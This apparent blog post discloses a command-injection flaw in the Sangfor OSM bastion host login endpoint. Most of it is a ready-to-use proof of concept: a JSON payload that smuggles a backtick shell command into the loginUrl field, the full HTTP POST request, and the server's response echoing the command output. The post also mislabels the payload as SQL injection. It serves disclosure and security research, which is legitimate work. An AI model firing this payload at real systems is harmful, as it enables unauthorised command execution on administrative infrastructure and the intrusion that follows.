文章

Command Execute in Sangfor OSM

发表于 更新于
作者 Tajang
1 分钟阅读
Command Execute in Sangfor OSM

Updated on 2025/11/14:

Title: Command Execute in Sangfor Operation and Maintenance Security Management System (Bastion Host) ≥ 3.0

BUG_Author: Tajang

Affected Version: Sangfor Operation and Maintenance Security Management System (Bastion Host) ≥ 3.0

Vendor: SangFor OSM

Software: SangFor OSM

Vulnerability Files:

  • fort/portal_login

Description:

  1. Execute commands on the frontend:

    • The vulnerability exists in the system’s fort/portal_login.

  2. Exploiting the Command Execution:

    • The login_url in the frontend can execute system commands.

  3. Example SQL Injection Payload:

    • The following payload can be used to execute system commands.: 
      1

      "{\"userName\":\"Bob\", \"loginUrl\":\"`id`\", \"role\": \"\",\"password\": \"123456789\"}" #

  4. Front-end Command Execution Point:

    • Send a POST request to this URL, with the Content-Type set to JSON format and the body containing the payload above::

      1

      http://<target-ip>/fort/portal_login

  5. Verifying the Exploit:

    • If the command execution is successful, the attacker will see the command echo in the response body of the returned packet.

Proof of Concept:

  1. Access the login page of the vulnerable application: 
    1

    https://example.com/fort/portal_login
  2. The complete post packet: 
    1
2
3
4
5
6
7
8

    POST /fort/portal_login HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36
Cookie: 
Content-Type: application/json; charset=utf-8
   
"{\"userName\":\"Bob\", \"loginUrl\":\"`id`\", \"role\": \"\",\"password\": \"123456789\"}" #
  3. If successful, you should see the following content in the response body.
1
2
3
4
5
6

{
  "redirectUrl": "uid=1005(webuser) gid=1006(webuser) groups=1006(webuser),65534(nogroup)",
  "message": "role为空",
  "isSuccess": false
}
漏洞挖掘
SangFor OSM
本文由作者按照 CC BY 4.0 进行授权